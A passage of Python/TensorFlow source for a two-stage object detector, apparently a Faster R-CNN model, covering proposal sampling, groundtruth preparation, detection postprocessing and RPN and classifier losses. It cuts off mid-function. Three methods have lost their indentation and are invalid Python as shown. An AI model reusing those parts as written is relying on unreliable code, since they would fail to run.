         single_image_groundtruth_boxlist,
         single_image_groundtruth_classes_with_background,
         single_image_groundtruth_weights) in zip(
             tf.unstack(proposal_boxes),
             tf.unstack(proposal_scores),
             tf.unstack(num_proposals),
             groundtruth_boxlists,
             groundtruth_classes_with_background_list,
             groundtruth_weights_list):
      single_image_boxlist = box_list.BoxList(single_image_proposal_boxes)
      single_image_boxlist.add_field(fields.BoxListFields.scores,
                                     single_image_proposal_scores)
      # Balanced sampling of positives/negatives for this image.
      sampled_boxlist = self._sample_box_classifier_minibatch_single_image(
          single_image_boxlist,
          single_image_num_proposals,
          single_image_groundtruth_boxlist,
          single_image_groundtruth_classes_with_background,
          single_image_groundtruth_weights)
      # Pad (or clip) to a fixed size so per-image results can be stacked.
      sampled_padded_boxlist = box_list_ops.pad_or_clip_box_list(
          sampled_boxlist,
          num_boxes=self._second_stage_batch_size)
      single_image_num_proposals_sample.append(tf.minimum(
          sampled_boxlist.num_boxes(),
          self._second_stage_batch_size))
      bb = sampled_padded_boxlist.get()
      single_image_proposal_box_sample.append(bb)
      single_image_proposal_score_sample.append(
          sampled_padded_boxlist.get_field(fields.BoxListFields.scores))
    return (tf.stack(single_image_proposal_box_sample),
            tf.stack(single_image_proposal_score_sample),
            tf.stack(single_image_num_proposals_sample))
  def _format_groundtruth_data(self, true_image_shapes):
    """Helper function for preparing groundtruth data for target assignment.

    In order to be consistent with the model.DetectionModel interface,
    groundtruth boxes are specified in normalized coordinates and classes are
    specified as label indices with no assumed background category. To prepare
    for target assignment, we:
    1) convert boxes to absolute coordinates,
    2) add a background class at class index 0
    3) groundtruth instance masks, if available, are resized to match
       image_shape.

    Args:
      true_image_shapes: int32 tensor of shape [batch, 3] where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.

    Returns:
      groundtruth_boxlists: A list of BoxLists containing (absolute) coordinates
        of the groundtruth boxes.
      groundtruth_classes_with_background_list: A list of 2-D one-hot
        (or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
        class targets with the 0th index assumed to map to the background class.
      groundtruth_masks_list: If present, a list of 3-D tf.float32 tensors of
        shape [num_boxes, image_height, image_width] containing instance masks.
        This is set to None if no masks exist in the provided groundtruth.
      groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
        [num_boxes] containing per-box weights; all-ones if no weights were
        provided in the groundtruth.
    """
    # 1) Convert normalized groundtruth boxes to absolute coordinates using
    #    each image's true (unpadded) shape.
    groundtruth_boxlists = [
        box_list_ops.to_absolute_coordinates(
            box_list.BoxList(boxes), true_image_shapes[i, 0],
            true_image_shapes[i, 1])
        for i, boxes in enumerate(
            self.groundtruth_lists(fields.BoxListFields.boxes))
    ]
    # 2) Prepend a zero background column so class index 0 is background.
    groundtruth_classes_with_background_list = []
    for one_hot_encoding in self.groundtruth_lists(
        fields.BoxListFields.classes):
      groundtruth_classes_with_background_list.append(
          tf.cast(
              tf.pad(one_hot_encoding, [[0, 0], [1, 0]], mode='CONSTANT'),
              dtype=tf.float32))

    groundtruth_masks_list = self._groundtruth_lists.get(
        fields.BoxListFields.masks)
    # TODO(rathodv): Remove mask resizing once the legacy pipeline is deleted.
    if groundtruth_masks_list is not None and self._resize_masks:
      resized_masks_list = []
      for mask in groundtruth_masks_list:
        _, resized_mask, _ = self._image_resizer_fn(
            # Reuse the given `image_resizer_fn` to resize groundtruth masks.
            # `mask` tensor for an image is of the shape [num_masks,
            # image_height, image_width]. Below we create a dummy image of the
            # the shape [image_height, image_width, 1] to use with
            # `image_resizer_fn`.
            image=tf.zeros(tf.stack([tf.shape(mask)[1],
                                     tf.shape(mask)[2], 1])),
            masks=mask)
        resized_masks_list.append(resized_mask)

      groundtruth_masks_list = resized_masks_list
    # Masks could be set to bfloat16 in the input pipeline for performance
    # reasons. Convert masks back to floating point space here since the rest of
    # this module assumes groundtruth to be of float32 type.
    float_groundtruth_masks_list = []
    if groundtruth_masks_list:
      for mask in groundtruth_masks_list:
        float_groundtruth_masks_list.append(tf.cast(mask, tf.float32))
      groundtruth_masks_list = float_groundtruth_masks_list

    if self.groundtruth_has_field(fields.BoxListFields.weights):
      groundtruth_weights_list = self.groundtruth_lists(
          fields.BoxListFields.weights)
    else:
      # Set weights for all batch elements equally to 1.0
      groundtruth_weights_list = []
      for groundtruth_classes in groundtruth_classes_with_background_list:
        num_gt = tf.shape(groundtruth_classes)[0]
        groundtruth_weights = tf.ones(num_gt)
        groundtruth_weights_list.append(groundtruth_weights)

    return (groundtruth_boxlists, groundtruth_classes_with_background_list,
            groundtruth_masks_list, groundtruth_weights_list)
  def _sample_box_classifier_minibatch_single_image(
      self, proposal_boxlist, num_valid_proposals, groundtruth_boxlist,
      groundtruth_classes_with_background, groundtruth_weights):
    """Samples a mini-batch of proposals to be sent to the box classifier.

    Helper function for self._postprocess_rpn.

    Args:
      proposal_boxlist: A BoxList containing K proposal boxes in absolute
        coordinates.
      num_valid_proposals: Number of valid proposals in the proposal boxlist.
      groundtruth_boxlist: A Boxlist containing N groundtruth object boxes in
        absolute coordinates.
      groundtruth_classes_with_background: A tensor with shape
        `[N, self.num_classes + 1]` representing groundtruth classes. The
        classes are assumed to be k-hot encoded, and include background as the
        zero-th class.
      groundtruth_weights: Weights attached to the groundtruth_boxes.

    Returns:
      a BoxList containing sampled proposals.
    """
    # Assign a class target to every proposal; unmatched proposals get the
    # background one-hot label ([1, 0, ..., 0]).
    (cls_targets, cls_weights, _, _, _) = self._detector_target_assigner.assign(
        proposal_boxlist,
        groundtruth_boxlist,
        groundtruth_classes_with_background,
        unmatched_class_label=tf.constant(
            [1] + self._num_classes * [0], dtype=tf.float32),
        groundtruth_weights=groundtruth_weights)
    # Selects all boxes as candidates if none of them is selected according
    # to cls_weights. This could happen as boxes within certain IOU ranges
    # are ignored. If triggered, the selected boxes will still be ignored
    # during loss computation.
    cls_weights = tf.reduce_mean(cls_weights, axis=-1)
    # A proposal is "positive" when its argmax class is not background (0).
    positive_indicator = tf.greater(tf.argmax(cls_targets, axis=1), 0)
    # Only proposals that are real (not zero padding) and not ignored by the
    # target assigner are eligible for sampling.
    valid_indicator = tf.logical_and(
        tf.range(proposal_boxlist.num_boxes()) < num_valid_proposals,
        cls_weights > 0
    )
    selected_positions = self._second_stage_sampler.subsample(
        valid_indicator,
        self._second_stage_batch_size,
        positive_indicator)
    return box_list_ops.boolean_mask(
        proposal_boxlist,
        selected_positions,
        use_static_shapes=self._use_static_shapes,
        indicator_sum=(self._second_stage_batch_size
                       if self._use_static_shapes else None))
def _compute_second_stage_input_feature_maps(self, features_to_crop,
proposal_boxes_normalized):
"""Crops to a set of proposals from the feature map for a batch of images.
Helper function for self._postprocess_rpn. This function calls
`tf.image.crop_and_resize` to create the feature map to be passed to the
second stage box classifier for each proposal.
Args:
features_to_crop: A float32 tensor with shape
[batch_size, height, width, depth]
proposal_boxes_normalized: A float32 tensor with shape [batch_size,
num_proposals, box_code_size] containing proposal boxes in
normalized coordinates.
Returns:
A float32 tensor with shape [K, new_height, new_width, depth].
"""
cropped_regions = self._flatten_first_two_dimensions(
self._crop_and_resize_fn(
features_to_crop, proposal_boxes_normalized,
[self._initial_crop_size, self._initial_crop_size]))
return self._maxpool_layer(cropped_regions)
  def _postprocess_box_classifier(self,
                                  refined_box_encodings,
                                  class_predictions_with_background,
                                  proposal_boxes,
                                  num_proposals,
                                  image_shapes,
                                  mask_predictions=None):
    """Converts predictions from the second stage box classifier to detections.

    Args:
      refined_box_encodings: a 3-D float tensor with shape
        [total_num_padded_proposals, num_classes, self._box_coder.code_size]
        representing predicted (final) refined box encodings. If using a shared
        box across classes the shape will instead be
        [total_num_padded_proposals, 1, 4]
      class_predictions_with_background: a 2-D float tensor with shape
        [total_num_padded_proposals, num_classes + 1] containing class
        predictions (logits) for each of the proposals. Note that this tensor
        *includes* background class predictions (at class index 0).
      proposal_boxes: a 3-D float tensor with shape
        [batch_size, self.max_num_proposals, 4] representing decoded proposal
        bounding boxes in absolute coordinates.
      num_proposals: a 1-D int32 tensor of shape [batch] representing the number
        of proposals predicted for each image in the batch.
      image_shapes: a 2-D int32 tensor containing shapes of input image in the
        batch.
      mask_predictions: (optional) a 4-D float tensor with shape
        [total_num_padded_proposals, num_classes, mask_height, mask_width]
        containing instance mask prediction logits.

    Returns:
      A dictionary containing:
        `detection_boxes`: [batch, max_detection, 4] in normalized co-ordinates.
        `detection_scores`: [batch, max_detections]
        `detection_multiclass_scores`: [batch, max_detections,
          num_classes_with_background] tensor with class score distribution for
          post-processed detection boxes including background class if any.
        `detection_anchor_indices`: [batch, max_detections] with anchor
          indices.
        `detection_classes`: [batch, max_detections]
        `num_detections`: [batch]
        `detection_masks`:
          (optional) [batch, max_detections, mask_height, mask_width]. Note
          that a pixel-wise sigmoid score converter is applied to the detection
          masks.
        `raw_detection_boxes`: [batch, total_detections, 4] tensor with decoded
          detection boxes in normalized coordinates, before Non-Max Suppression.
          The value total_detections is the number of second stage anchors
          (i.e. the total number of boxes before NMS).
        `raw_detection_scores`: [batch, total_detections,
          num_classes_with_background] tensor of multi-class scores for
          raw detection boxes. The value total_detections is the number of
          second stage anchors (i.e. the total number of boxes before NMS).
    """
    # Un-flatten the per-proposal tensors back to a batch layout: the first
    # dim goes from total_num_padded_proposals to [batch, max_num_proposals].
    refined_box_encodings_batch = tf.reshape(
        refined_box_encodings,
        [-1,
         self.max_num_proposals,
         refined_box_encodings.shape[1],
         self._box_coder.code_size])
    class_predictions_with_background_batch = tf.reshape(
        class_predictions_with_background,
        [-1, self.max_num_proposals, self.num_classes + 1]
    )
    refined_decoded_boxes_batch = self._batch_decode_boxes(
        refined_box_encodings_batch, proposal_boxes)
    # Convert logits to scores (e.g. softmax) via the configured converter.
    class_predictions_with_background_batch_normalized = (
        self._second_stage_score_conversion_fn(
            class_predictions_with_background_batch))
    # Drop the background column (index 0) before NMS.
    class_predictions_batch = tf.reshape(
        tf.slice(class_predictions_with_background_batch_normalized,
                 [0, 0, 1], [-1, -1, -1]),
        [-1, self.max_num_proposals, self.num_classes])
    clip_window = self._compute_clip_window(image_shapes)
    mask_predictions_batch = None
    if mask_predictions is not None:
      mask_height = shape_utils.get_dim_as_int(mask_predictions.shape[2])
      mask_width = shape_utils.get_dim_as_int(mask_predictions.shape[3])
      # Pixel-wise sigmoid converts mask logits to [0, 1] scores.
      mask_predictions = tf.sigmoid(mask_predictions)
      mask_predictions_batch = tf.reshape(
          mask_predictions, [-1, self.max_num_proposals,
                             self.num_classes, mask_height, mask_width])

    batch_size = shape_utils.combined_static_and_dynamic_shape(
        refined_box_encodings_batch)[0]
    # Track which proposal ("anchor") each final detection came from.
    batch_anchor_indices = tf.tile(
        tf.expand_dims(tf.range(self.max_num_proposals), 0),
        multiples=[batch_size, 1])
    additional_fields = {
        'multiclass_scores': class_predictions_with_background_batch_normalized,
        'anchor_indices': tf.cast(batch_anchor_indices, tf.float32)
    }
    (nmsed_boxes, nmsed_scores, nmsed_classes, nmsed_masks,
     nmsed_additional_fields, num_detections) = self._second_stage_nms_fn(
         refined_decoded_boxes_batch,
         class_predictions_batch,
         clip_window=clip_window,
         change_coordinate_frame=True,
         num_valid_boxes=num_proposals,
         additional_fields=additional_fields,
         masks=mask_predictions_batch)
    if refined_decoded_boxes_batch.shape[2] > 1:
      # Per-class boxes: for the raw (pre-NMS) output, keep the box of the
      # highest-scoring foreground class for each proposal.
      class_ids = tf.expand_dims(
          tf.argmax(class_predictions_with_background_batch[:, :, 1:], axis=2,
                    output_type=tf.int32),
          axis=-1)
      raw_detection_boxes = tf.squeeze(
          tf.batch_gather(refined_decoded_boxes_batch, class_ids), axis=2)
    else:
      raw_detection_boxes = tf.squeeze(refined_decoded_boxes_batch, axis=2)

    raw_normalized_detection_boxes = shape_utils.static_or_dynamic_map_fn(
        self._normalize_and_clip_boxes,
        elems=[raw_detection_boxes, image_shapes],
        dtype=tf.float32)

    detections = {
        fields.DetectionResultFields.detection_boxes:
            nmsed_boxes,
        fields.DetectionResultFields.detection_scores:
            nmsed_scores,
        fields.DetectionResultFields.detection_classes:
            nmsed_classes,
        fields.DetectionResultFields.detection_multiclass_scores:
            nmsed_additional_fields['multiclass_scores'],
        fields.DetectionResultFields.detection_anchor_indices:
            tf.cast(nmsed_additional_fields['anchor_indices'], tf.int32),
        fields.DetectionResultFields.num_detections:
            tf.cast(num_detections, dtype=tf.float32),
        fields.DetectionResultFields.raw_detection_boxes:
            raw_normalized_detection_boxes,
        fields.DetectionResultFields.raw_detection_scores:
            class_predictions_with_background_batch_normalized
    }
    if nmsed_masks is not None:
      detections[fields.DetectionResultFields.detection_masks] = nmsed_masks
    return detections
def _batch_decode_boxes(self, box_encodings, anchor_boxes):
"""Decodes box encodings with respect to the anchor boxes.
Args:
box_encodings: a 4-D tensor with shape
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
representing box encodings.
anchor_boxes: [batch_size, num_anchors, self._box_coder.code_size]
representing decoded bounding boxes. If using a shared box across
classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
Returns:
decoded_boxes: a
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
float tensor representing bounding box predictions (for each image in
batch, proposal and class). If using a shared box across classes the
shape will instead be
[batch_size, num_anchors, 1, self._box_coder.code_size].
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(
box_encodings)
num_classes = combined_shape[2]
tiled_anchor_boxes = tf.tile(
tf.expand_dims(anchor_boxes, 2), [1, 1, num_classes, 1])
tiled_anchors_boxlist = box_list.BoxList(
tf.reshape(tiled_anchor_boxes, [-1, 4]))
decoded_boxes = self._box_coder.decode(
tf.reshape(box_encodings, [-1, self._box_coder.code_size]),
tiled_anchors_boxlist)
return tf.reshape(decoded_boxes.get(),
tf.stack([combined_shape[0], combined_shape[1],
num_classes, 4]))
def _normalize_and_clip_boxes(self, boxes_and_image_shape):
"""Normalize and clip boxes."""
boxes_per_image = boxes_and_image_shape[0]
image_shape = boxes_and_image_shape[1]
boxes_contains_classes_dim = boxes_per_image.shape.ndims == 3
if boxes_contains_classes_dim:
boxes_per_image = shape_utils.flatten_first_n_dimensions(
boxes_per_image, 2)
normalized_boxes_per_image = box_list_ops.to_normalized_coordinates(
box_list.BoxList(boxes_per_image),
image_shape[0],
image_shape[1],
check_range=False).get()
normalized_boxes_per_image = box_list_ops.clip_to_window(
box_list.BoxList(normalized_boxes_per_image),
tf.constant([0.0, 0.0, 1.0, 1.0], tf.float32),
filter_nonoverlapping=False).get()
if boxes_contains_classes_dim:
max_num_proposals, num_classes, _ = (
shape_utils.combined_static_and_dynamic_shape(
boxes_and_image_shape[0]))
normalized_boxes_per_image = shape_utils.expand_first_dimension(
normalized_boxes_per_image, [max_num_proposals, num_classes])
return normalized_boxes_per_image
  def loss(self, prediction_dict, true_image_shapes, scope=None):
    """Compute scalar loss tensors given prediction tensors.

    If number_of_stages=1, only RPN related losses are computed (i.e.,
    `rpn_localization_loss` and `rpn_objectness_loss`). Otherwise all
    losses are computed.

    Args:
      prediction_dict: a dictionary holding prediction tensors (see the
        documentation for the predict method. If number_of_stages=1, we
        expect prediction_dict to contain `rpn_box_encodings`,
        `rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
        `image_shape`, and `anchors` fields. Otherwise we expect
        prediction_dict to additionally contain `refined_box_encodings`,
        `class_predictions_with_background`, `num_proposals`, and
        `proposal_boxes` fields.
      true_image_shapes: int32 tensor of shape [batch, 3] where each row is
        of the form [height, width, channels] indicating the shapes
        of true images in the resized images, as resized images can be padded
        with zeros.
      scope: Optional scope name.

    Returns:
      a dictionary mapping loss keys (`first_stage_localization_loss`,
        `first_stage_objectness_loss`, 'second_stage_localization_loss',
        'second_stage_classification_loss') to scalar tensors representing
        corresponding loss values.
    """
    with tf.name_scope(scope, 'Loss', prediction_dict.values()):
      (groundtruth_boxlists, groundtruth_classes_with_background_list,
       groundtruth_masks_list, groundtruth_weights_list
      ) = self._format_groundtruth_data(true_image_shapes)
      # RPN losses are always computed.
      loss_dict = self._loss_rpn(
          prediction_dict['rpn_box_encodings'],
          prediction_dict['rpn_objectness_predictions_with_background'],
          prediction_dict['anchors'], groundtruth_boxlists,
          groundtruth_classes_with_background_list, groundtruth_weights_list)
      if self._number_of_stages > 1:
        # Add second-stage (box classifier, and optionally mask) losses.
        loss_dict.update(
            self._loss_box_classifier(
                prediction_dict['refined_box_encodings'],
                prediction_dict['class_predictions_with_background'],
                prediction_dict['proposal_boxes'],
                prediction_dict['num_proposals'], groundtruth_boxlists,
                groundtruth_classes_with_background_list,
                groundtruth_weights_list, prediction_dict['image_shape'],
                prediction_dict.get('mask_predictions'), groundtruth_masks_list,
                prediction_dict.get(
                    fields.DetectionResultFields.detection_boxes),
                prediction_dict.get(
                    fields.DetectionResultFields.num_detections)))
    return loss_dict
  def _loss_rpn(self, rpn_box_encodings,
                rpn_objectness_predictions_with_background, anchors,
                groundtruth_boxlists, groundtruth_classes_with_background_list,
                groundtruth_weights_list):
    """Computes scalar RPN loss tensors.

    Uses self._proposal_target_assigner to obtain regression and classification
    targets for the first stage RPN, samples a "minibatch" of anchors to
    participate in the loss computation, and returns the RPN losses.

    Args:
      rpn_box_encodings: A 3-D float tensor of shape
        [batch_size, num_anchors, self._box_coder.code_size] containing
        predicted proposal box encodings.
      rpn_objectness_predictions_with_background: A 3-D float tensor of shape
        [batch_size, num_anchors, 2] containing objectness predictions
        (logits) for each of the anchors with 0 corresponding to background
        and 1 corresponding to object.
      anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
        for the first stage RPN. Note that `num_anchors` can differ depending
        on whether the model is created in training or inference mode.
      groundtruth_boxlists: A list of BoxLists containing coordinates of the
        groundtruth boxes.
      groundtruth_classes_with_background_list: A list of 2-D one-hot
        (or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
        class targets with the 0th index assumed to map to the background class.
      groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
        [num_boxes] containing weights for groundtruth boxes.

    Returns:
      a dictionary mapping loss keys (`first_stage_localization_loss`,
        `first_stage_objectness_loss`) to scalar tensors representing
        corresponding loss values.
    """
    with tf.name_scope('RPNLoss'):
      # Assign binary (object vs background) targets to every anchor.
      # gt_class_targets_batch is None per image: the RPN is class-agnostic.
      (batch_cls_targets, batch_cls_weights, batch_reg_targets,
       batch_reg_weights, _) = target_assigner.batch_assign_targets(
           target_assigner=self._proposal_target_assigner,
           anchors_batch=box_list.BoxList(anchors),
           gt_box_batch=groundtruth_boxlists,
           gt_class_targets_batch=(len(groundtruth_boxlists) * [None]),
           gt_weights_batch=groundtruth_weights_list)
      batch_cls_weights = tf.reduce_mean(batch_cls_weights, axis=2)
      batch_cls_targets = tf.squeeze(batch_cls_targets, axis=2)

      # Balanced subsampling of anchors per image for the minibatch.
      def _minibatch_subsample_fn(inputs):
        cls_targets, cls_weights = inputs
        return self._first_stage_sampler.subsample(
            tf.cast(cls_weights, tf.bool),
            self._first_stage_minibatch_size, tf.cast(cls_targets, tf.bool))
      batch_sampled_indices = tf.cast(shape_utils.static_or_dynamic_map_fn(
          _minibatch_subsample_fn,
          [batch_cls_targets, batch_cls_weights],
          dtype=tf.bool,
          parallel_iterations=self._parallel_iterations,
          back_prop=True), dtype=tf.float32)

      # Normalize by number of examples in sampled minibatch
      normalizer = tf.maximum(
          tf.reduce_sum(batch_sampled_indices, axis=1), 1.0)
      batch_one_hot_targets = tf.one_hot(
          tf.cast(batch_cls_targets, dtype=tf.int32), depth=2)
      # Regression loss only applies to sampled anchors matched to an object.
      sampled_reg_indices = tf.multiply(batch_sampled_indices,
                                        batch_reg_weights)

      losses_mask = None
      if self.groundtruth_has_field(fields.InputDataFields.is_annotated):
        losses_mask = tf.stack(self.groundtruth_lists(
            fields.InputDataFields.is_annotated))
      localization_losses = self._first_stage_localization_loss(
          rpn_box_encodings, batch_reg_targets, weights=sampled_reg_indices,
          losses_mask=losses_mask)
      objectness_losses = self._first_stage_objectness_loss(
          rpn_objectness_predictions_with_background,
          batch_one_hot_targets,
          weights=tf.expand_dims(batch_sampled_indices, axis=-1),
          losses_mask=losses_mask)
      localization_loss = tf.reduce_mean(
          tf.reduce_sum(localization_losses, axis=1) / normalizer)
      objectness_loss = tf.reduce_mean(
          tf.reduce_sum(objectness_losses, axis=1) / normalizer)

      localization_loss = tf.multiply(self._first_stage_loc_loss_weight,
                                      localization_loss,
                                      name='localization_loss')
      objectness_loss = tf.multiply(self._first_stage_obj_loss_weight,
                                    objectness_loss, name='objectness_loss')
      loss_dict = {'Loss/RPNLoss/localization_loss': localization_loss,
                   'Loss/RPNLoss/objectness_loss': objectness_loss}
    return loss_dict
  def _loss_box_classifier(self,
                           refined_box_encodings,
                           class_predictions_with_background,
                           proposal_boxes,
                           num_proposals,
                           groundtruth_boxlists,
                           groundtruth_classes_with_background_list,
                           groundtruth_weights_list,
                           image_shape,
                           prediction_masks=None,
                           groundtruth_masks_list=None,
                           detection_boxes=None,
                           num_detections=None):
    """Computes scalar box classifier loss tensors.
    Uses self._detector_target_assigner to obtain regression and classification
    targets for the second stage box classifier, optionally performs
    hard mining, and returns losses. All losses are computed independently
    for each image and then averaged across the batch.
    Please note that for boxes and masks with multiple labels, the box
    regression and mask prediction losses are only computed for one label.
    This function assumes that the proposal boxes in the "padded" regions are
    actually zero (and thus should not be matched to).
    Args:
      refined_box_encodings: a 3-D tensor with shape
        [total_num_proposals, num_classes, box_coder.code_size] representing
        predicted (final) refined box encodings. If using a shared box across
        classes this will instead have shape
        [total_num_proposals, 1, box_coder.code_size].
      class_predictions_with_background: a 2-D tensor with shape
        [total_num_proposals, num_classes + 1] containing class
        predictions (logits) for each of the anchors. Note that this tensor
        *includes* background class predictions (at class index 0).
      proposal_boxes: [batch_size, self.max_num_proposals, 4] representing
        decoded proposal bounding boxes.
      num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
        representing the number of proposals predicted for each image in
        the batch.
      groundtruth_boxlists: a list of BoxLists containing coordinates of the
        groundtruth boxes.
      groundtruth_classes_with_background_list: a list of 2-D one-hot
        (or k-hot) tensors of shape [num_boxes, num_classes + 1] containing the
        class targets with the 0th index assumed to map to the background class.
      groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
        [num_boxes] containing weights for groundtruth boxes.
      image_shape: a 1-D tensor of shape [4] representing the image shape.
      prediction_masks: an optional 4-D tensor with shape [total_num_proposals,
        num_classes, mask_height, mask_width] containing the instance masks for
        each box.
      groundtruth_masks_list: an optional list of 3-D tensors of shape
        [num_boxes, image_height, image_width] containing the instance masks for
        each of the boxes.
      detection_boxes: 3-D float tensor of shape [batch,
        max_total_detections, 4] containing post-processed detection boxes in
        normalized co-ordinates.
      num_detections: 1-D int32 tensor of shape [batch] containing number of
        valid detections in `detection_boxes`.
    Returns:
      a dictionary mapping loss keys ('second_stage_localization_loss',
        'second_stage_classification_loss') to scalar tensors representing
        corresponding loss values.
    Raises:
      ValueError: if `predict_instance_masks` in
        second_stage_mask_rcnn_box_predictor is True and
        `groundtruth_masks_list` is not provided.
    """
    with tf.name_scope('BoxClassifierLoss'):
      # Boolean [batch_size, max_num_proposals] marking real (non-padded)
      # proposals; padded entries are excluded from the losses below.
      paddings_indicator = self._padded_batched_proposals_indicator(
          num_proposals, proposal_boxes.shape[1])
      proposal_boxlists = [
          box_list.BoxList(proposal_boxes_single_image)
          for proposal_boxes_single_image in tf.unstack(proposal_boxes)]
      batch_size = len(proposal_boxlists)
      # Per-image proposal counts, clamped to at least 1 to avoid a
      # divide-by-zero in the normalizer.
      num_proposals_or_one = tf.cast(tf.expand_dims(
          tf.maximum(num_proposals, tf.ones_like(num_proposals)), 1),
                                     dtype=tf.float32)
      normalizer = tf.tile(num_proposals_or_one,
                           [1, self.max_num_proposals]) * batch_size
      # Match proposals against groundtruth to produce per-proposal
      # classification and box regression targets.
      (batch_cls_targets_with_background, batch_cls_weights, batch_reg_targets,
       batch_reg_weights, _) = target_assigner.batch_assign_targets(
           target_assigner=self._detector_target_assigner,
           anchors_batch=proposal_boxlists,
           gt_box_batch=groundtruth_boxlists,
           gt_class_targets_batch=groundtruth_classes_with_background_list,
           unmatched_class_label=tf.constant(
               [1] + self._num_classes * [0], dtype=tf.float32),
           gt_weights_batch=groundtruth_weights_list)
      class_predictions_with_background = tf.reshape(
          class_predictions_with_background,
          [batch_size, self.max_num_proposals, -1])
      flat_cls_targets_with_background = tf.reshape(
          batch_cls_targets_with_background,
          [batch_size * self.max_num_proposals, -1])
      # Collapse (possibly k-hot) class targets to a single class per proposal
      # via argmax, then re-expand to strict one-hot.
      one_hot_flat_cls_targets_with_background = tf.argmax(
          flat_cls_targets_with_background, axis=1)
      one_hot_flat_cls_targets_with_background = tf.one_hot(
          one_hot_flat_cls_targets_with_background,
          flat_cls_targets_with_background.get_shape()[1])
      # If using a shared box across classes use directly
      if refined_box_encodings.shape[1] == 1:
        reshaped_refined_box_encodings = tf.reshape(
            refined_box_encodings,
            [batch_size, self.max_num_proposals, self._box_coder.code_size])
      # For anchors with multiple labels, picks refined_location_encodings
      # for just one class to avoid over-counting for regression loss and
      # (optionally) mask loss.
      else:
        reshaped_refined_box_encodings = (
            self._get_refined_encodings_for_postitive_class(
                refined_box_encodings,
                one_hot_flat_cls_targets_with_background, batch_size))
      losses_mask = None
      if self.groundtruth_has_field(fields.InputDataFields.is_annotated):
        # Per-image mask that excludes un-annotated images from the losses.
        losses_mask = tf.stack(self.groundtruth_lists(
            fields.InputDataFields.is_annotated))
      second_stage_loc_losses = self._second_stage_localization_loss(
          reshaped_refined_box_encodings,
          batch_reg_targets,
          weights=batch_reg_weights,
          losses_mask=losses_mask) / normalizer
      second_stage_cls_losses = ops.reduce_sum_trailing_dimensions(
          self._second_stage_classification_loss(
              class_predictions_with_background,
              batch_cls_targets_with_background,
              weights=batch_cls_weights,
              losses_mask=losses_mask),
          ndims=2) / normalizer
      second_stage_loc_loss = tf.reduce_sum(
          second_stage_loc_losses * tf.cast(paddings_indicator,
                                            dtype=tf.float32))
      second_stage_cls_loss = tf.reduce_sum(
          second_stage_cls_losses * tf.cast(paddings_indicator,
                                            dtype=tf.float32))
      # Optionally replace the plain sums with hard-mined losses.
      if self._hard_example_miner:
        (second_stage_loc_loss, second_stage_cls_loss
        ) = self._unpad_proposals_and_apply_hard_mining(
            proposal_boxlists, second_stage_loc_losses,
            second_stage_cls_losses, num_proposals)
      localization_loss = tf.multiply(self._second_stage_loc_loss_weight,
                                      second_stage_loc_loss,
                                      name='localization_loss')
      classification_loss = tf.multiply(self._second_stage_cls_loss_weight,
                                        second_stage_cls_loss,
                                        name='classification_loss')
      loss_dict = {'Loss/BoxClassifierLoss/localization_loss':
                       localization_loss,
                   'Loss/BoxClassifierLoss/classification_loss':
                       classification_loss}
      second_stage_mask_loss = None
      if prediction_masks is not None:
        if groundtruth_masks_list is None:
          raise ValueError('Groundtruth instance masks not provided. '
                           'Please configure input reader.')
        if not self._is_training:
          # At eval time mask features come from detection (not proposal)
          # boxes, so recompute boxes/classes against the detections.
          (proposal_boxes, proposal_boxlists, paddings_indicator,
           one_hot_flat_cls_targets_with_background
          ) = self._get_mask_proposal_boxes_and_classes(
              detection_boxes, num_detections, image_shape,
              groundtruth_boxlists, groundtruth_classes_with_background_list,
              groundtruth_weights_list)
        unmatched_mask_label = tf.zeros(image_shape[1:3], dtype=tf.float32)
        (batch_mask_targets, _, _, batch_mask_target_weights,
         _) = target_assigner.batch_assign_targets(
             target_assigner=self._detector_target_assigner,
             anchors_batch=proposal_boxlists,
             gt_box_batch=groundtruth_boxlists,
             gt_class_targets_batch=groundtruth_masks_list,
             unmatched_class_label=unmatched_mask_label,
             gt_weights_batch=groundtruth_weights_list)
        # Pad the prediction_masks with to add zeros for background class to be
        # consistent with class predictions.
        if prediction_masks.get_shape().as_list()[1] == 1:
          # Class agnostic masks or masks for one-class prediction. Logic for
          # both cases is the same since background predictions are ignored
          # through the batch_mask_target_weights.
          prediction_masks_masked_by_class_targets = prediction_masks
        else:
          prediction_masks_with_background = tf.pad(
              prediction_masks, [[0, 0], [1, 0], [0, 0], [0, 0]])
          prediction_masks_masked_by_class_targets = tf.boolean_mask(
              prediction_masks_with_background,
              tf.greater(one_hot_flat_cls_targets_with_background, 0))
        mask_height = shape_utils.get_dim_as_int(prediction_masks.shape[2])
        mask_width = shape_utils.get_dim_as_int(prediction_masks.shape[3])
        reshaped_prediction_masks = tf.reshape(
            prediction_masks_masked_by_class_targets,
            [batch_size, -1, mask_height * mask_width])
        batch_mask_targets_shape = tf.shape(batch_mask_targets)
        flat_gt_masks = tf.reshape(batch_mask_targets,
                                   [-1, batch_mask_targets_shape[2],
                                    batch_mask_targets_shape[3]])
        # Use normalized proposals to crop mask targets from image masks.
        flat_normalized_proposals = box_list_ops.to_normalized_coordinates(
            box_list.BoxList(tf.reshape(proposal_boxes, [-1, 4])),
            image_shape[1], image_shape[2], check_range=False).get()
        flat_cropped_gt_mask = self._crop_and_resize_fn(
            tf.expand_dims(flat_gt_masks, -1),
            tf.expand_dims(flat_normalized_proposals, axis=1),
            [mask_height, mask_width])
        # Without stopping gradients into cropped groundtruth masks the
        # performance with 100-padded groundtruth masks when batch size > 1 is
        # about 4% worse.
        # TODO(rathodv): Investigate this since we don't expect any variables
        # upstream of flat_cropped_gt_mask.
        flat_cropped_gt_mask = tf.stop_gradient(flat_cropped_gt_mask)
        batch_cropped_gt_mask = tf.reshape(
            flat_cropped_gt_mask,
            [batch_size, -1, mask_height * mask_width])
        mask_losses_weights = (
            batch_mask_target_weights * tf.cast(paddings_indicator,
                                                dtype=tf.float32))
        mask_losses = self._second_stage_mask_loss(
            reshaped_prediction_masks,
